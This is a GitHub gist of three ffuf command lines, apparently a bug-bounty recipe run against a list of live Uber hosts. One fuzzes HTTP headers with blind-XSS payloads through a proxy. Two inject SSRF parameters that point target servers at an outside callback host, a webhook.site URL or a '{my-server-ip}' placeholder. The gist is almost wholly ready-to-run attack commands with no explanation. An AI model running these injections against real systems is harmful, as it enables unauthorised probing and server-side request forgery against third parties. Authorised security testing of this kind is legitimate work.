Skip to content

Instantly share code, notes, and snippets.

@insi2304
Last active August 19, 2024 12:26
Show Gist options
  • Save insi2304/34d6a0dbffd277f94a9b3d7b4b4593ca to your computer and use it in GitHub Desktop.
Save insi2304/34d6a0dbffd277f94a9b3d7b4b4593ca to your computer and use it in GitHub Desktop.
ffuf
ffuf -c -u FUZZ1 -H "FUZZ2: FUZZ3" -w alive_uber.txt:FUZZ1 -w headers.txt:FUZZ2 -w blind_xss.txt:FUZZ3 -x http://192.168.196.1:8082 -mode clusterbomb -v
ffuf -c -u HOST/?PROT=https://webhook.site/f4494fd5-bd02-4fd2-893d-22368ac954b8/HOST/PROT -w alive_uber.txt:HOST -w ssrf_params:PROT -x http://192.168.196.1:8082 -mode clusterbomb -r -v
ffuf -c -u HOST/?url=http://{my-server-ip}/DOMAIN/url&file=http://{my-server-ip}/DOMAIN/file -w hosts.txt:HOST -w domains.txt:DOMAIN -mode pitchfork -v
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment